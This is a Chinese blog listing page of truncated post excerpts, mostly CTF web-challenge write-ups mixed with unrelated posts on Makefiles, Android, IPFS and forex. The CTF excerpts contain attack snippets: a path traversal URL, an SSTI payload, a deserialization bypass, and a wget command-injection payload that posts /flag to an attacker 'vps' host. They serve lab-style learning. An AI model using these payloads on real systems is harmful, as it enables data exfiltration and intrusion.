[SCTF 2018]ZhuanXV
赛题:[SCTF 2018]ZhuanXV文章目录赛题:[SCTF 2018]ZhuanXV读取文件sql注入漏洞读取文件使用dirsearch工具进行扫描发现/list,访问是个登录界面,查看源码发现背景图片的路径查看web.xmlhttp://111.200.241.244:63455/loadimage?fileName=../../WEB-INF/web.xml发现使用了strut2框架,struts.xml是struts2的核心配置文件,在开发过程中利用率最高。该文件主
pearcmd.php的妙用
pearcmd.php的妙用文章目录pearcmd.php的妙用1. register_argc_argvcli模式下WEB模式中简单的利用2. pearcmd.php的神奇使用3. register_argc_argv和pear的关系4. payload靶机可出网靶机不可出网时参考链接1. register_argc_argv如果环境中含有php.ini,则默认register_argc_argv=Off;如果环境中没有php.ini,则默认register_argc_argv=On这个regis
陇原战“疫“2021网络安全大赛 Web CheckIN
checkin文章目录checkinwget外带数据分析官方wpnosql注入ssrf参考链接参考链接:利用命令注入外带数据的一些姿势_一个安全研究员-CSDN博客_smb外带注入题目有附件下载,是个go语言,审计一下 ,文件目录如下注意wget还有wget外带数据根据上面的博客,可以执行命令wegt数据外带出来wget?argv=1&argv=--post-file&argv=/flag&argv=http://vps:7777/然后既可以得到flag
陇原战“疫“2021网络安全大赛 Web eaaasyphp
eaaasyphp文章目录eaaasyphp读取phpinfo打fastcgi恶意的ftp服务构造pop链参考链接题目给出了源码读取phpinfo尝试反序列化读取phpinfo但是__wakeup()函数先于destruct函数执行,所以需要绕过:__PHP :: Bug #81151 :: bypass __wakeup?code=C:4:"Hint":0:{}注意这个FPM/FastCGI打fastcgi使用Gopherus生成打fastcgi的payload:gopher
[红明谷CTF 2021]write_shell
[红明谷CTF 2021]write_shell文章目录[红明谷CTF 2021]write_shell代码审计最后的payload参考链接代码审计题目给出了源码<?phperror_reporting(0);highlight_file(__FILE__);//检查是否还有违规符号function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(p
冰蝎(Behinder)双击无法打开
冰蝎(Behinder)双击无法打开文章目录冰蝎(Behinder)双击无法打开尝试过的解决方法最后的解决方法参考链接不想讲过多废话:我的环境如下,如果感觉环境不是很相符的,可以关闭这个页面了windows10java环境 11.0.2 2019-01-15 LTS做题需要用到冰蝎,所以去github上进行下载,放一下链接:Releases · rebeyond/Behinder (github.com)点击这个下载之后,解压,然后我本机是安装了java环境的,java11.0.2但是双
[CSCCTF 2019 Qual]FlaskLight
[CSCCTF 2019 Qual]FlaskLight文章目录[CSCCTF 2019 Qual]FlaskLight模板注入payload1payload2payload3参考文章模板注入搜索,返回查询内容f12中提示,GET方式传参search可以判断ssti查看所有子类?search={{''.__class__.__mro__[2].__subclasses__()}}寻找可用子类,这里使用下python脚本来寻找可用类的序号import requestsimport re
[HITCON 2017]SSRFme
[HITCON 2017]SSRFme文章目录[HITCON 2017]SSRFmepathinfo()函数payload参考文章打开题目,就是源码<?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_hea
[网鼎杯 2018]Comment
文章目录[CSCCTF 2019 Qual]FlaskLight解题过程payload1payload2payload3参考文章[RCTF2015]EasySQL解题过程payload参考文章[HITCON 2017]SSRFme解题过程payload参考文章[网鼎杯 2018]Comment解题过程payload参考文章[CSCCTF 2019 Qual]FlaskLight解题过程f12中提示,GET方式传参search可以判断ssti查看所有子类?search={{''.__class_
常见的HTTP状态码和常用服务端口号
1.HTTP状态码分类2.常见的状态码200 - 请求成功301 - 永久性重定向,表示请求的资源被分配了新的URL,之后应使用更改的URL302 - 临时性重定向,表示请求的资源被分配了新的URL,希望本次访问使用新的URL400 - 客户端请求语法错误401 - 请求未经授权403 - 服务求收到请求,但是拒绝服务404 - 服务器上无法找到请求资源500 - 服务器内部错误503 -服务器暂时处于超负载或正在进行停机维护,现在无法处理请求。3.HTTP.
嵌入式Linux开发工具C语言 Makefile的编写
工程管理器make1、什么是工程?----如何编写Makefile文件多个源文件+其他文件(图片+头文件+脚本文件)2、工程管理器的作用->自动编译编译多个源文件------------gcc+所有源文件 -o 可执行文件3、make的依赖Makefile文件4、Makefile文件是一种脚本文件(批处理),存在相关语法;5、Makefile语法三要素:目标、依赖、命令格式:目标:依赖tab 命令目标:最终生成的文件依赖:生成目标时所需要的文件命令:生成目标时,需要执行
使用Android Studio 查看内存泄漏
用新版的AS 的profiler 查看内存泄漏记录一下使用Android Studio 的profiler 查看内存泄漏的过程。新版的AS 的profiler 功`能强大。我们可以很方便的查看到一个界面里的内存泄漏。首先我们制造一个内存泄漏的Activitypublic class MemoryLeakActivity extends AppCompatActivity { private static int FLAG = 999; @Override protected
AI平民化之路 - 华为云ModelArts和AI Gallery体验指南
在校期间主学机器学习和算法,在一次偶然的机会接触了大数据,而后便入门大数据,至今也从事大数据平台开发工作。可是,仍然对AI技术念念不忘呀,平常也会做点机器学习相关的小东西,尝试一些demo,想着某一天还能回到曾经熟悉的领域,正如我博客名称,从大数据到人工智能。由于我的工作也是平台相关的,所以本次ModelArts的体验对我来说不仅仅是产品的使用者,更是一个产品的学习者。话不多说,接下来和大家分享一下作为产品使用者的体验。作为一站式AI开发平台,华为云ModelArts提供了全周期AI工作流管理,让用.
星际文件系统:2021年Web3主流的核心支柱
星际文件系统:2021年Web3主流的核心支柱2021年Web3应用程序的受欢迎程度飙升。此技术用例的增长也给支持它们的基础设施带来了更大的需求。星际文件系统成为整个Web3生态系统开发人员和用户使用的解决方案中不可或缺的一部分。01、网络统计 存储在星际文件系统上的NFT:15M+ 每周唯一活跃星际文件系统节点:230K+ 星际文件系统网关用户每周:370万+ 星际文件系统每周网关请求:805M+ 02、2021年的合作星际文件系统和NFT.St
【FXCG】关于交易理念
交易理念对每个交易者极为重要,你拥有怎样的交易理念,就是产生怎样的交易系统。先有正确的交易理念,再有其实用的交易技术;技术建立在思维之上,但思维的高度决定技术的实用。核心理念准确率:就是做单的胜率。(短线比较重要,中长线基本可以忽略不计)。盈亏比:就是盈利与亏损的比例(这个很重要,盈亏比在3比1以上,就是赚一次,可以弥补3次的亏损。),只有盈亏比达到理想的状态,就算胜率只有30%,也能保持不败之地。如果胜率达到40%左右,就能长期盈利。仓位盈亏比:就是赚钱的时候永远是重仓,亏钱的时候永远的是
今日推荐
周排行